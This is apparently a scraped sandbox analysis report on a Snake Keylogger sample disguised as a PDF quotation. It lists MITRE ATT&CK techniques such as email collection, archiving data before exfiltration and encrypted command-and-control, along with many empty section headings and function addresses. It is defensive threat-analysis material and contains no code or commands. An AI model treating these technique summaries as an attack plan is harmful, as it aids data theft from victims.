Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Function 00007FF8491619F5 Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Function 00007FF849148029 Relevance: .9, Instructions: 897
COMMON

Function 00007FF848F40328 Relevance: 3.2, Strings: 2, Instructions: 655
COMMON

Function 00007FF849093ABD Relevance: 1.8, Strings: 1, Instructions: 534
COMMON

Function 00007FF849093759 Relevance: 1.6, Strings: 1, Instructions: 359
COMMON

Function 00007FF848F409A5 Relevance: 1.6, Strings: 1, Instructions: 307
COMMON

Function 00007FF848F408B5 Relevance: 1.3, Strings: 1, Instructions: 97
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre